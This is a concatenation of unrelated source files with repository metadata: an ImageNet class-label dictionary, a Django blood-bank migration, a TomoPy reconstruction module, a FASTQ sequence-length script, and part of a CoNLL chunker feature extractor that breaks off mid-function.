393: 'anemone fish',
394: 'sturgeon',
395: 'gar, garfish, garpike, billfish, Lepisosteus osseus',
396: 'lionfish',
397: 'puffer, pufferfish, blowfish, globefish',
398: 'abacus',
399: 'abaya',
400: "academic gown, academic robe, judge's robe",
401: 'accordion, piano accordion, squeeze box',
402: 'acoustic guitar',
403: 'aircraft carrier, carrier, flattop, attack aircraft carrier',
404: 'airliner',
405: 'airship, dirigible',
406: 'altar',
407: 'ambulance',
408: 'amphibian, amphibious vehicle',
409: 'analog clock',
410: 'apiary, bee house',
411: 'apron',
412: 'ashcan, trash can, garbage can, wastebin, ash bin, ash-bin, ashbin, dustbin, trash barrel, trash bin',
413: 'assault rifle, assault gun',
414: 'backpack, back pack, knapsack, packsack, rucksack, haversack',
415: 'bakery, bakeshop, bakehouse',
416: 'balance beam, beam',
417: 'balloon',
418: 'ballpoint, ballpoint pen, ballpen, Biro',
419: 'Band Aid',
420: 'banjo',
421: 'bannister, banister, balustrade, balusters, handrail',
422: 'barbell',
423: 'barber chair',
424: 'barbershop',
425: 'barn',
426: 'barometer',
427: 'barrel, cask',
428: 'barrow, garden cart, lawn cart, wheelbarrow',
429: 'baseball',
430: 'basketball',
431: 'bassinet',
432: 'bassoon',
433: 'bathing cap, swimming cap',
434: 'bath towel',
435: 'bathtub, bathing tub, bath, tub',
436: 'beach wagon, station wagon, wagon, estate car, beach waggon, station waggon, waggon',
437: 'beacon, lighthouse, beacon light, pharos',
438: 'beaker',
439: 'bearskin, busby, shako',
440: 'beer bottle',
441: 'beer glass',
442: 'bell cote, bell cot',
443: 'bib',
444: 'bicycle-built-for-two, tandem bicycle, tandem',
445: 'bikini, two-piece',
446: 'binder, ring-binder',
447: 'binoculars, field glasses, opera glasses',
448: 'birdhouse',
449: 'boathouse',
450: 'bobsled, bobsleigh, bob',
451: 'bolo tie, bolo, bola tie, bola',
452: 'bonnet, poke bonnet',
453: 'bookcase',
454: 'bookshop, bookstore, bookstall',
455: 'bottlecap',
456: 'bow',
457: 'bow tie, bow-tie, bowtie',
458: 'brass, memorial tablet, plaque',
459: 'brassiere, bra, bandeau',
460: 'breakwater, groin, groyne, mole, bulwark, seawall, jetty',
461: 'breastplate, aegis, egis',
462: 'broom',
463: 'bucket, pail',
464: 'buckle',
465: 'bulletproof vest',
466: 'bullet train, bullet',
467: 'butcher shop, meat market',
468: 'cab, hack, taxi, taxicab',
469: 'caldron, cauldron',
470: 'candle, taper, wax light',
471: 'cannon',
472: 'canoe',
473: 'can opener, tin opener',
474: 'cardigan',
475: 'car mirror',
476: 'carousel, carrousel, merry-go-round, roundabout, whirligig',
477: "carpenter's kit, tool kit",
478: 'carton',
479: 'car wheel',
480: 'cash machine, cash dispenser, automated teller machine, automatic teller machine, automated teller, automatic teller, ATM',
481: 'cassette',
482: 'cassette player',
483: 'castle',
484: 'catamaran',
485: 'CD player',
486: 'cello, violoncello',
487: 'cellular telephone, cellular phone, cellphone, cell, mobile phone',
488: 'chain',
489: 'chainlink fence',
490: 'chain mail, ring mail, mail, chain armor, chain armour, ring armor, ring armour',
491: 'chain saw, chainsaw',
492: 'chest',
493: 'chiffonier, commode',
494: 'chime, bell, gong',
495: 'china cabinet, china closet',
496: 'Christmas stocking',
497: 'church, church building',
498: 'cinema, movie theater, movie theatre, movie house, picture palace',
499: 'cleaver, meat cleaver, chopper',
500: 'cliff dwelling',
501: 'cloak',
502: 'clog, geta, patten, sabot',
503: 'cocktail shaker',
504: 'coffee mug',
505: 'coffeepot',
506: 'coil, spiral, volute, whorl, helix',
507: 'combination lock',
508: 'computer keyboard, keypad',
509: 'confectionery, confectionary, candy store',
510: 'container ship, containership, container vessel',
511: 'convertible',
512: 'corkscrew, bottle screw',
513: 'cornet, horn, trumpet, trump',
514: 'cowboy boot',
515: 'cowboy hat, ten-gallon hat',
516: 'cradle',
517: 'crane',
518: 'crash helmet',
519: 'crate',
520: 'crib, cot',
521: 'Crock Pot',
522: 'croquet ball',
523: 'crutch',
524: 'cuirass',
525: 'dam, dike, dyke',
526: 'desk',
527: 'desktop computer',
528: 'dial telephone, dial phone',
529: 'diaper, nappy, napkin',
530: 'digital clock',
531: 'digital watch',
532: 'dining table, board',
533: 'dishrag, dishcloth',
534: 'dishwasher, dish washer, dishwashing machine',
535: 'disk brake, disc brake',
536: 'dock, dockage, docking facility',
537: 'dogsled, dog sled, dog sleigh',
538: 'dome',
539: 'doormat, welcome mat',
540: 'drilling platform, offshore rig',
541: 'drum, membranophone, tympan',
542: 'drumstick',
543: 'dumbbell',
544: 'Dutch oven',
545: 'electric fan, blower',
546: 'electric guitar',
547: 'electric locomotive',
548: 'entertainment center',
549: 'envelope',
550: 'espresso maker',
551: 'face powder',
552: 'feather boa, boa',
553: 'file, file cabinet, filing cabinet',
554: 'fireboat',
555: 'fire engine, fire truck',
556: 'fire screen, fireguard',
557: 'flagpole, flagstaff',
558: 'flute, transverse flute',
559: 'folding chair',
560: 'football helmet',
561: 'forklift',
562: 'fountain',
563: 'fountain pen',
564: 'four-poster',
565: 'freight car',
566: 'French horn, horn',
567: 'frying pan, frypan, skillet',
568: 'fur coat',
569: 'garbage truck, dustcart',
570: 'gasmask, respirator, gas helmet',
571: 'gas pump, gasoline pump, petrol pump, island dispenser',
572: 'goblet',
573: 'go-kart',
574: 'golf ball',
575: 'golfcart, golf cart',
576: 'gondola',
577: 'gong, tam-tam',
578: 'gown',
579: 'grand piano, grand',
580: 'greenhouse, nursery, glasshouse',
581: 'grille, radiator grille',
582: 'grocery store, grocery, food market, market',
583: 'guillotine',
584: 'hair slide',
585: 'hair spray',
586: 'half track',
587: 'hammer',
588: 'hamper',
589: 'hand blower, blow dryer, blow drier, hair dryer, hair drier',
590: 'hand-held computer, hand-held microcomputer',
591: 'handkerchief, hankie, hanky, hankey',
592: 'hard disc, hard disk, fixed disk',
593: 'harmonica, mouth organ, harp, mouth harp',
594: 'harp',
595: 'harvester, reaper',
596: 'hatchet',
597: 'holster',
598: 'home theater, home theatre',
599: 'honeycomb',
600: 'hook, claw',
601: 'hoopskirt, crinoline',
602: 'horizontal bar, high bar',
603: 'horse cart, horse-cart',
604: 'hourglass',
605: 'iPod',
606: 'iron, smoothing iron',
607: "jack-o'-lantern",
608: 'jean, blue jean, denim',
609: 'jeep, landrover',
610: 'jersey, T-shirt, tee shirt',
611: 'jigsaw puzzle',
612: 'jinrikisha, ricksha, rickshaw',
613: 'joystick',
614: 'kimono',
615: 'knee pad',
616: 'knot',
617: 'lab coat, laboratory coat',
618: 'ladle',
619: 'lampshade, lamp shade',
620: 'laptop, laptop computer',
621: 'lawn mower, mower',
622: 'lens cap, lens cover',
623: 'letter opener, paper knife, paperknife',
624: 'library',
625: 'lifeboat',
626: 'lighter, light, igniter, ignitor',
627: 'limousine, limo',
628: 'liner, ocean liner',
629: 'lipstick, lip rouge',
630: 'Loafer',
631: 'lotion',
632: 'loudspeaker, speaker, speaker unit, loudspeaker system, speaker system',
633: "loupe, jeweler's loupe",
634: 'lumbermill, sawmill',
635: 'magnetic compass',
636: 'mailbag, postbag',
637: 'mailbox, letter box',
638: 'maillot',
639: 'maillot, tank suit',
640: 'manhole cover',
641: 'maraca',
642: 'marimba, xylophone',
643: 'mask',
644: 'matchstick',
645: 'maypole',
646: 'maze, labyrinth',
647: 'measuring cup',
648: 'medicine chest, medicine cabinet',
649: 'megalith, megalithic structure',
650: 'microphone, mike',
651: 'microwave, microwave oven',
652: 'military uniform',
653: 'milk can',
654: 'minibus',
655: 'miniskirt, mini',
656: 'minivan',
657: 'missile',
658: 'mitten',
659: 'mixing bowl',
660: 'mobile home, manufactured home',
661: 'Model T',
662: 'modem',
663: 'monastery',
664: 'monitor',
665: 'moped',
666: 'mortar',
667: 'mortarboard',
668: 'mosque',
669: 'mosquito net',
670: 'motor scooter, scooter',
671: 'mountain bike, all-terrain bike, off-roader',
672: 'mountain tent',
673: 'mouse, computer mouse',
674: 'mousetrap',
675: 'moving van',
676: 'muzzle',
677: 'nail',
678: 'neck brace',
679: 'necklace',
680: 'nipple',
681: 'notebook, notebook computer',
682: 'obelisk',
683: 'oboe, hautboy, hautbois',
684: 'ocarina, sweet potato',
685: 'odometer, hodometer, mileometer, milometer',
686: 'oil filter',
687: 'organ, pipe organ',
688: 'oscilloscope, scope, cathode-ray oscilloscope, CRO',
689: 'overskirt',
690: 'oxcart',
691: 'oxygen mask',
692: 'packet',
693: 'paddle, boat paddle',
694: 'paddlewheel, paddle wheel',
695: 'padlock',
696: 'paintbrush',
697: "pajama, pyjama, pj's, jammies",
698: 'palace',
699: 'panpipe, pandean pipe, syrinx',
700: 'paper towel',
701: 'parachute, chute',
702: 'parallel bars, bars',
703: 'park bench',
704: 'parking meter',
705: 'passenger car, coach, carriage',
706: 'patio, terrace',
707: 'pay-phone, pay-station',
708: 'pedestal, plinth, footstall',
709: 'pencil box, pencil case',
710: 'pencil sharpener',
711: 'perfume, essence',
712: 'Petri dish',
713: 'photocopier',
714: 'pick, plectrum, plectron',
715: 'pickelhaube',
716: 'picket fence, paling',
717: 'pickup, pickup truck',
718: 'pier',
719: 'piggy bank, penny bank',
720: 'pill bottle',
721: 'pillow',
722: 'ping-pong ball',
723: 'pinwheel',
724: 'pirate, pirate ship',
725: 'pitcher, ewer',
726: "plane, carpenter's plane, woodworking plane",
727: 'planetarium',
728: 'plastic bag',
729: 'plate rack',
730: 'plow, plough',
731: "plunger, plumber's helper",
732: 'Polaroid camera, Polaroid Land camera',
733: 'pole',
734: 'police van, police wagon, paddy wagon, patrol wagon, wagon, black Maria',
735: 'poncho',
736: 'pool table, billiard table, snooker table',
737: 'pop bottle, soda bottle',
738: 'pot, flowerpot',
739: "potter's wheel",
740: 'power drill',
741: 'prayer rug, prayer mat',
742: 'printer',
743: 'prison, prison house',
744: 'projectile, missile',
745: 'projector',
746: 'puck, hockey puck',
747: 'punching bag, punch bag, punching ball, punchball',
748: 'purse',
749: 'quill, quill pen',
750: 'quilt, comforter, comfort, puff',
751: 'racer, race car, racing car',
752: 'racket, racquet',
753: 'radiator',
754: 'radio, wireless',
755: 'radio telescope, radio reflector',
756: 'rain barrel',
757: 'recreational vehicle, RV, R.V.',
758: 'reel',
759: 'reflex camera',
760: 'refrigerator, icebox',
761: 'remote control, remote',
762: 'restaurant, eating house, eating place, eatery',
763: 'revolver, six-gun, six-shooter',
764: 'rifle',
765: 'rocking chair, rocker',
766: 'rotisserie',
767: 'rubber eraser, rubber, pencil eraser',
768: 'rugby ball',
769: 'rule, ruler',
770: 'running shoe',
771: 'safe',
772: 'safety pin',
773: 'saltshaker, salt shaker',
774: 'sandal',
775: 'sarong',
776: 'sax, saxophone',
777: 'scabbard',
778: 'scale, weighing machine',
779: 'school bus',
780: 'schooner',
781: 'scoreboard',
782: 'screen, CRT screen',
783: 'screw',
784: 'screwdriver',
785: 'seat belt, seatbelt',
786: 'sewing machine',
787: 'shield, buckler',
788: 'shoe shop, shoe-shop, shoe store',
789: 'shoji',
790: 'shopping basket',
791: 'shopping cart',
792: 'shovel',
793: 'shower cap',
794: 'shower curtain',
795: 'ski',
796: 'ski mask',
797: 'sleeping bag',
798: 'slide rule, slipstick',
799: 'sliding door',
800: 'slot, one-armed bandit',
801: 'snorkel',
802: 'snowmobile',
803: 'snowplow, snowplough',
804: 'soap dispenser',
805: 'soccer ball',
806: 'sock',
807: 'solar dish, solar collector, solar furnace',
808: 'sombrero',
809: 'soup bowl',
810: 'space bar',
811: 'space heater',
812: 'space shuttle',
813: 'spatula',
814: 'speedboat',
815: "spider web, spider's web",
816: 'spindle',
817: 'sports car, sport car',
818: 'spotlight, spot',
819: 'stage',
820: 'steam locomotive',
821: 'steel arch bridge',
822: 'steel drum',
823: 'stethoscope',
824: 'stole',
825: 'stone wall',
826: 'stopwatch, stop watch',
827: 'stove',
828: 'strainer',
829: 'streetcar, tram, tramcar, trolley, trolley car',
830: 'stretcher',
831: 'studio couch, day bed',
832: 'stupa, tope',
833: 'submarine, pigboat, sub, U-boat',
834: 'suit, suit of clothes',
835: 'sundial',
836: 'sunglass',
837: 'sunglasses, dark glasses, shades',
838: 'sunscreen, sunblock, sun blocker',
839: 'suspension bridge',
840: 'swab, swob, mop',
841: 'sweatshirt',
842: 'swimming trunks, bathing trunks',
843: 'swing',
844: 'switch, electric switch, electrical switch',
845: 'syringe',
846: 'table lamp',
847: 'tank, army tank, armored combat vehicle, armoured combat vehicle',
848: 'tape player',
849: 'teapot',
850: 'teddy, teddy bear',
851: 'television, television system',
852: 'tennis ball',
853: 'thatch, thatched roof',
854: 'theater curtain, theatre curtain',
855: 'thimble',
856: 'thresher, thrasher, threshing machine',
857: 'throne',
858: 'tile roof',
859: 'toaster',
860: 'tobacco shop, tobacconist shop, tobacconist',
861: 'toilet seat',
862: 'torch',
863: 'totem pole',
864: 'tow truck, tow car, wrecker',
865: 'toyshop',
866: 'tractor',
867: 'trailer truck, tractor trailer, trucking rig, rig, articulated lorry, semi',
868: 'tray',
869: 'trench coat',
870: 'tricycle, trike, velocipede',
871: 'trimaran',
872: 'tripod',
873: 'triumphal arch',
874: 'trolleybus, trolley coach, trackless trolley',
875: 'trombone',
876: 'tub, vat',
877: 'turnstile',
878: 'typewriter keyboard',
879: 'umbrella',
880: 'unicycle, monocycle',
881: 'upright, upright piano',
882: 'vacuum, vacuum cleaner',
883: 'vase',
884: 'vault',
885: 'velvet',
886: 'vending machine',
887: 'vestment',
888: 'viaduct',
889: 'violin, fiddle',
890: 'volleyball',
891: 'waffle iron',
892: 'wall clock',
893: 'wallet, billfold, notecase, pocketbook',
894: 'wardrobe, closet, press',
895: 'warplane, military plane',
896: 'washbasin, handbasin, washbowl, lavabo, wash-hand basin',
897: 'washer, automatic washer, washing machine',
898: 'water bottle',
899: 'water jug',
900: 'water tower',
901: 'whiskey jug',
902: 'whistle',
903: 'wig',
904: 'window screen',
905: 'window shade',
906: 'Windsor tie',
907: 'wine bottle',
908: 'wing',
909: 'wok',
910: 'wooden spoon',
911: 'wool, woolen, woollen',
912: 'worm fence, snake fence, snake-rail fence, Virginia fence',
913: 'wreck',
914: 'yawl',
915: 'yurt',
916: 'web site, website, internet site, site',
917: 'comic book',
918: 'crossword puzzle, crossword',
919: 'street sign',
920: 'traffic light, traffic signal, stoplight',
921: 'book jacket, dust cover, dust jacket, dust wrapper',
922: 'menu',
923: 'plate',
924: 'guacamole',
925: 'consomme',
926: 'hot pot, hotpot',
927: 'trifle',
928: 'ice cream, icecream',
929: 'ice lolly, lolly, lollipop, popsicle',
930: 'French loaf',
931: 'bagel, beigel',
932: 'pretzel',
933: 'cheeseburger',
934: 'hotdog, hot dog, red hot',
935: 'mashed potato',
936: 'head cabbage',
937: 'broccoli',
938: 'cauliflower',
939: 'zucchini, courgette',
940: 'spaghetti squash',
941: 'acorn squash',
942: 'butternut squash',
943: 'cucumber, cuke',
944: 'artichoke, globe artichoke',
945: 'bell pepper',
946: 'cardoon',
947: 'mushroom',
948: 'Granny Smith',
949: 'strawberry',
950: 'orange',
951: 'lemon',
952: 'fig',
953: 'pineapple, ananas',
954: 'banana',
955: 'jackfruit, jak, jack',
956: 'custard apple',
957: 'pomegranate',
958: 'hay',
959: 'carbonara',
960: 'chocolate sauce, chocolate syrup',
961: 'dough',
962: 'meat loaf, meatloaf',
963: 'pizza, pizza pie',
964: 'potpie',
965: 'burrito',
966: 'red wine',
967: 'espresso',
968: 'cup',
969: 'eggnog',
970: 'alp',
971: 'bubble',
972: 'cliff, drop, drop-off',
973: 'coral reef',
974: 'geyser',
975: 'lakeside, lakeshore',
976: 'promontory, headland, head, foreland',
977: 'sandbar, sand bar',
978: 'seashore, coast, seacoast, sea-coast',
979: 'valley, vale',
980: 'volcano',
981: 'ballplayer, baseball player',
982: 'groom, bridegroom',
983: 'scuba diver',
984: 'rapeseed',
985: 'daisy',
986: "yellow lady's slipper, yellow lady-slipper, Cypripedium calceolus, Cypripedium parviflorum",
987: 'corn',
988: 'acorn',
989: 'hip, rose hip, rosehip',
990: 'buckeye, horse chestnut, conker',
991: 'coral fungus',
992: 'agaric',
993: 'gyromitra',
994: 'stinkhorn, carrion fungus',
995: 'earthstar',
996: 'hen-of-the-woods, hen of the woods, Polyporus frondosus, Grifola frondosa',
997: 'bolete',
998: 'ear, spike, capitulum',
999: 'toilet tissue, toilet paper, bathroom tissue'}
|
[
"46166076+Tunoc@users.noreply.github.com"
] |
46166076+Tunoc@users.noreply.github.com
|
b1da81e45980e885470ba6b0e3d6abd5ee4b893f
|
950eb2c41a9835c1fe0daffd8856039b2535072f
|
/index/migrations/0001_initial.py
|
9b198c2122bf3b192b5f306be1632ded398ccd96
|
[] |
no_license
|
shazolKh/bloodbank
|
21f701e77c812b007eac6dea3e3520cf5a268f54
|
905479c57c68a7e872fac05ce0f5514ec01b02d6
|
refs/heads/master
| 2023-06-04T14:22:36.849281
| 2021-06-19T08:19:20
| 2021-06-19T08:19:20
| 331,898,006
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,044
|
py
|
# Generated by Django 3.1.1 on 2021-02-22 17:22
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('blood_group', models.CharField(max_length=5)),
('location', models.CharField(max_length=100)),
('hospital', models.CharField(max_length=100)),
('contact', models.CharField(max_length=30)),
('managed', models.CharField(max_length=5)),
('details', models.TextField()),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
[
"shazol.kh@gmail.com"
] |
shazol.kh@gmail.com
|
80c4f2efe33abda42f37afbea34d12a29ba0f188
|
b7a13f1c9e02bacb621febcf63f4245b24e2f6df
|
/tomopy/recon/algorithm.py
|
c48ac3f6a0e224df688857cc577e951a91f56184
|
[] |
no_license
|
AaronBM/tomopy
|
551b94ebf69f546028fb49aaa5d70068cf608c24
|
bca22f8b0b2c9002d3e4fdeeeb99631d40bd085d
|
refs/heads/master
| 2021-01-21T03:02:51.190014
| 2015-05-19T17:22:58
| 2015-05-19T17:22:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,893
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# #########################################################################
# Copyright (c) 2015, UChicago Argonne, LLC. All rights reserved. #
# #
# Copyright 2015. UChicago Argonne, LLC. This software was produced #
# under U.S. Government contract DE-AC02-06CH11357 for Argonne National #
# Laboratory (ANL), which is operated by UChicago Argonne, LLC for the #
# U.S. Department of Energy. The U.S. Government has rights to use, #
# reproduce, and distribute this software. NEITHER THE GOVERNMENT NOR #
# UChicago Argonne, LLC MAKES ANY WARRANTY, EXPRESS OR IMPLIED, OR #
# ASSUMES ANY LIABILITY FOR THE USE OF THIS SOFTWARE. If software is #
# modified to produce derivative works, such modified software should #
# be clearly marked, so as not to confuse it with the version available #
# from ANL. #
# #
# Additionally, redistribution and use in source and binary forms, with #
# or without modification, are permitted provided that the following #
# conditions are met: #
# #
# * Redistributions of source code must retain the above copyright #
# notice, this list of conditions and the following disclaimer. #
# #
# * Redistributions in binary form must reproduce the above copyright #
# notice, this list of conditions and the following disclaimer in #
# the documentation and/or other materials provided with the #
# distribution. #
# #
# * Neither the name of UChicago Argonne, LLC, Argonne National #
# Laboratory, ANL, the U.S. Government, nor the names of its #
# contributors may be used to endorse or promote products derived #
# from this software without specific prior written permission. #
# #
# THIS SOFTWARE IS PROVIDED BY UChicago Argonne, LLC AND CONTRIBUTORS #
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT #
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS #
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL UChicago #
# Argonne, LLC OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, #
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, #
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; #
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER #
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT #
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN #
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE #
# POSSIBILITY OF SUCH DAMAGE. #
# #########################################################################
"""
Module for reconstruction algorithms.
"""
from __future__ import absolute_import, division, print_function
import numpy as np
import tomopy.util.mproc as mproc
import tomopy.util.extern as extern
import tomopy.util.dtype as dtype
from tomopy.sim.project import angles, get_center
import multiprocessing
import logging
logger = logging.getLogger(__name__)
__author__ = "Doga Gursoy"
__copyright__ = "Copyright (c) 2015, UChicago Argonne, LLC."
__docformat__ = 'restructuredtext en'
__all__ = ['recon']
def recon(
tomo, theta, center=None, emission=True, algorithm=None,
init_recon=None, ncore=None, nchunk=None, **kwargs):
"""
Reconstruct object from projection data.
Parameters
----------
tomo : ndarray
3D tomographic data.
theta : array
Projection angles in radian.
center: array, optional
Location of rotation axis.
emission : bool, optional
Determines whether data is emission or transmission type.
algorithm : {str, function}
One of the following string values.
'art'
Algebraic reconstruction technique :cite:`Kak:98`.
'bart'
Block algebraic reconstruction technique.
'fbp'
Filtered back-projection algorithm.
'gridrec'
Fourier grid reconstruction algorithm :cite:`Dowd:99`,
:cite:`Rivers:06`.
'mlem'
Maximum-likelihood expectation maximization algorithm
:cite:`Dempster:77`.
'osem'
Ordered-subset expectation maximization algorithm
:cite:`Hudson:94`.
'ospml_hybrid'
Ordered-subset penalized maximum likelihood algorithm with
weighted linear and quadratic penalties.
'ospml_quad'
Ordered-subset penalized maximum likelihood algorithm with
quadratic penalties.
'pml_hybrid'
Penalized maximum likelihood algorithm with weighted linear
and quadratic penalties :cite:`Chang:04`.
'pml_quad'
Penalized maximum likelihood algorithm with quadratic penalty.
'sirt'
Simultaneous algebraic reconstruction technique.
num_gridx, num_gridy : int, optional
Number of pixels along x- and y-axes in the reconstruction grid.
num_iter : int, optional
Number of algorithm iterations performed.
num_block : int, optional
Number of data blocks for intermediate updating the object.
ind_block : array of int, optional
Order of projections to be used for updating.
num_iter : int, optional
Number of algorithm iterations performed.
reg_par : float, optional
Regularization parameter for smoothing.
init_recon : ndarray, optional
Initial guess of the reconstruction.
ncore : int, optional
Number of cores that will be assigned to jobs.
nchunk : int, optional
Chunk size for each core.
Returns
-------
ndarray
Reconstructed 3D object.
Warning
-------
Filtering is not implemented for fbp.
Example
-------
>>> import tomopy
>>> obj = tomopy.shepp3d() # Generate an object.
>>> ang = tomopy.angles(180) # Generate uniformly spaced tilt angles.
>>> sim = tomopy.project(obj, ang) # Calculate projections.
>>> rec = tomopy.recon(sim, ang, algorithm='art') # Reconstruct object.
>>>
>>> # Show 64th slice of the reconstructed object.
>>> import pylab
>>> pylab.imshow(rec[64], cmap='gray')
>>> pylab.show()
"""
allowed_kwargs = {
'art': ['num_gridx', 'num_gridy', 'num_iter'],
'bart': ['num_gridx', 'num_gridy', 'num_iter',
'num_block', 'ind_block'],
'fbp': ['num_gridx', 'num_gridy', 'filter_name'],
'gridrec': ['num_gridx', 'num_gridy', 'filter_name'],
'mlem': ['num_gridx', 'num_gridy', 'num_iter'],
'osem': ['num_gridx', 'num_gridy', 'num_iter',
'num_block', 'ind_block'],
'ospml_hybrid': ['num_gridx', 'num_gridy', 'num_iter',
'reg_par', 'num_block', 'ind_block'],
'ospml_quad': ['num_gridx', 'num_gridy', 'num_iter',
'reg_par', 'num_block', 'ind_block'],
'pml_hybrid': ['num_gridx', 'num_gridy', 'num_iter', 'reg_par'],
'pml_quad': ['num_gridx', 'num_gridy', 'num_iter', 'reg_par'],
'sirt': ['num_gridx', 'num_gridy', 'num_iter'],
}
# Generate kwargs for the algorithm.
kwargs_defaults = _get_algorithm_kwargs(tomo.shape)
if isinstance(algorithm, str):
# Make sure have allowed kwargs appropriate for algorithm.
for key in kwargs:
if key not in allowed_kwargs[algorithm]:
raise ValueError('%s keyword not in allowed keywords %s' %
(key, allowed_kwargs[algorithm]))
# Set kwarg defaults.
for kw in allowed_kwargs[algorithm]:
kwargs.setdefault(kw, kwargs_defaults[kw])
elif algorithm is None:
raise ValueError('Keyword "algorithm" must be one of %s.' %
(list(allowed_kwargs.keys()),))
# Generate args for the algorithm.
args = _get_algorithm_args(tomo.shape, theta, center)
# Initialize tomography data and initial reconstruction.
tomo = _init_tomo(tomo, emission)
recon = _init_recon(
(tomo.shape[1], kwargs['num_gridx'], kwargs['num_gridy']),
init_recon)
return _dist_recon(
tomo, recon, _get_c_func(algorithm), args, kwargs, ncore, nchunk)
def _init_tomo(tomo, emission):
tomo = dtype.as_float32(tomo)
if not emission:
tomo = -np.log(tomo)
return tomo
def _init_recon(shape, init_recon, val=1e-6):
if init_recon is None:
recon = val * np.ones(shape, dtype='float32')
else:
recon = dtype.as_float32(recon)
return recon
def _get_c_func(algorithm):
if algorithm == 'art':
func = extern.c_art
elif algorithm == 'bart':
func = extern.c_bart
elif algorithm == 'fbp':
func = extern.c_fbp
elif algorithm == 'gridrec':
func = extern.c_gridrec
elif algorithm == 'mlem':
func = extern.c_mlem
elif algorithm == 'osem':
func = extern.c_osem
elif algorithm == 'ospml_hybrid':
func = extern.c_ospml_hybrid
elif algorithm == 'ospml_quad':
func = extern.c_ospml_quad
elif algorithm == 'pml_hybrid':
func = extern.c_pml_hybrid
elif algorithm == 'pml_quad':
func = extern.c_pml_quad
elif algorithm == 'sirt':
func = extern.c_sirt
return func
def _dist_recon(tomo, recon, algorithm, args, kwargs, ncore, nchunk):
mproc.init_tomo(tomo)
return mproc.distribute_jobs(
recon,
func=algorithm,
args=args,
kwargs=kwargs,
axis=0,
ncore=ncore,
nchunk=nchunk)
def _get_algorithm_args(shape, theta, center):
dx, dy, dz = shape
theta = dtype.as_float32(theta)
center = get_center(shape, center)
return (dx, dy, dz, center, theta)
def _get_algorithm_kwargs(shape):
dx, dy, dz = shape
return {
'num_gridx': dz,
'num_gridy': dz,
'filter_name': np.array('shepp', dtype=(str, 16)),
'num_iter': dtype.as_int32(1),
'reg_par': np.ones(10, dtype='float32'),
'num_block': dtype.as_int32(1),
'ind_block': np.arange(0, dx, dtype='float32'),
}
|
[
"sparsedata@gmail.com"
] |
sparsedata@gmail.com
|
38034b21d34d73cf790818852942f4790e553aa7
|
1c5a8cf45bbba1a50ba5110090e0de7cd70a5677
|
/python/old/seq_lengths2.py
|
a522847e4c4b17cb19885e908fe2b6c05c2062d9
|
[] |
no_license
|
bradleycolquitt/umi
|
d6e45f365c9ce4c2fc694b8d3c7418807ae59a38
|
f9e94974a20872ee373cd5dd91aaf951d90dc295
|
refs/heads/master
| 2021-05-16T02:44:51.127160
| 2017-07-25T17:25:48
| 2017-07-25T17:25:48
| 26,970,700
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 412
|
py
|
#! /usr/bin/env python
import sys
import gzip
import time
def main(argv):
file = gzip.open(argv[1])
total_seq = 0
lineno = 0
start = time.time()
for l in file:
if lineno % 4 == 1:
total_seq += len(l)
lineno += 1
print "Time elapsed: " + str(time.time() - start)
print "Total sequence: " + str(total_seq)
if __name__ == "__main__":
main(sys.argv)
|
[
"bradley.colquitt@gmail.com"
] |
bradley.colquitt@gmail.com
|
7fa32bc0bce678ad3b24a49bff6158fcd8c850f8
|
98895acc9f12800ce7fc0d9e552d455db3489cd1
|
/lab3/ml_chunker_v2.py
|
4d7d410e5d05d3d883a88ee1bc854825fcb87386
|
[] |
no_license
|
Ga22be/EDAN20
|
7a559595c3509648d752ba092b23b03790cc2a49
|
151ed285bc16de3e994a1012cfa7d60082d8b571
|
refs/heads/master
| 2020-07-23T10:10:52.854906
| 2019-10-15T09:48:11
| 2019-10-15T09:48:11
| 207,524,338
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,272
|
py
|
"""
Machine learning chunker for CoNLL 2000
"""
__author__ = "Pierre Nugues"
import time
import conll_reader
from sklearn.feature_extraction import DictVectorizer
from sklearn import svm
from sklearn import linear_model
from sklearn import metrics
from sklearn import tree
from sklearn.naive_bayes import GaussianNB
from sklearn.model_selection import GridSearchCV
def extract_features(sentences, w_size, feature_names):
"""
Builds X matrix and y vector
X is a list of dictionaries and y is a list
:param sentences:
:param w_size:
:return:
"""
X_l = []
y_l = []
for sentence in sentences:
X, y = extract_features_sent(sentence, w_size, feature_names)
X_l.extend(X)
y_l.extend(y)
return X_l, y_l
def extract_features_sent(sentence, w_size, feature_names):
"""
Extract the features from one sentence
returns X and y, where X is a list of dictionaries and
y is a list of symbols
:param sentence: string containing the CoNLL structure of a sentence
:param w_size:
:return:
"""
# We pad the sentence to extract the context window more easily
start = "BOS BOS BOS\n"
end = "\nEOS EOS EOS"
start *= w_size
end *= w_size
sentence = start + sentence
sentence += end
# Each sentence is a list of rows
sentence = sentence.splitlines()
padded_sentence = list()
for line in sentence:
line = line.split()
padded_sentence.append(line)
# print(padded_sentence)
# We extract the features and the classes
# X contains is a list of features, where each feature vector is a dictionary
# y is the list of classes
X = list()
y = list()
for i in range(len(padded_sentence) - 2 * w_size):
# x is a row of X
x = list()
# The words in lower case
for j in range(2 * w_size + 1):
x.append(padded_sentence[i + j][0].lower())
# The POS
for j in range(2 * w_size + 1):
x.append(padded_sentence[i + j][1])
